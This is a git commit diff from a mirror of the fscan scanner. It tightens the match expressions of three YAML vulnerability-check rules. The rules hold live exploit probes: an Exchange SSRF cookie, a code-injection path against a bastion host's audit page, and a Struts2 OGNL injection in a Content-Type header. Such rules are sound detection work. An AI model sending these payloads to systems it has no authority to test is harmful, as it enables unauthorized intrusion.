mirror of https://github.com/qwqdanchun/fscan.git
更新mod库、编码、poc等
This commit is contained in:
parent
402add56c7
commit
400f4373c9
|
@ -6,7 +6,7 @@ rules:
|
||||||
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
|
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
|
||||||
follow_redirects: false
|
follow_redirects: false
|
||||||
expression: |
|
expression: |
|
||||||
response.headers["X-CalculatedBETarget"].icontains("localhost")
|
"X-CalculatedBETarget" in response.headers && response.headers["X-CalculatedBETarget"].icontains("localhost")
|
||||||
detail:
|
detail:
|
||||||
author: sharecast
|
author: sharecast
|
||||||
Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010"
|
Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010"
|
||||||
|
|
|
@ -5,7 +5,7 @@ rules:
|
||||||
path: >-
|
path: >-
|
||||||
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
|
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
|
||||||
expression: |
|
expression: |
|
||||||
response.status == 200 && response.body.bcontains(b"错误的id")
|
response.status == 200 && response.body.bcontains(b"错误的id") && response.body.bcontains(b"审计管理员") && response.body.bcontains(b"事件审计")
|
||||||
detail:
|
detail:
|
||||||
author: we1x4n(https://we1x4n.com/)
|
author: we1x4n(https://we1x4n.com/)
|
||||||
links:
|
links:
|
||||||
|
|
|
@ -9,7 +9,7 @@ rules:
|
||||||
Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data
|
Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data
|
||||||
follow_redirects: true
|
follow_redirects: true
|
||||||
expression: |
|
expression: |
|
||||||
response.headers["Keyvalue"].contains(string(r1 * r2))
|
"Keyvalue" in response.headers && response.headers["Keyvalue"].contains(string(r1 * r2))
|
||||||
detail:
|
detail:
|
||||||
author: shadown1ng(https://github.com/shadown1ng)
|
author: shadown1ng(https://github.com/shadown1ng)
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue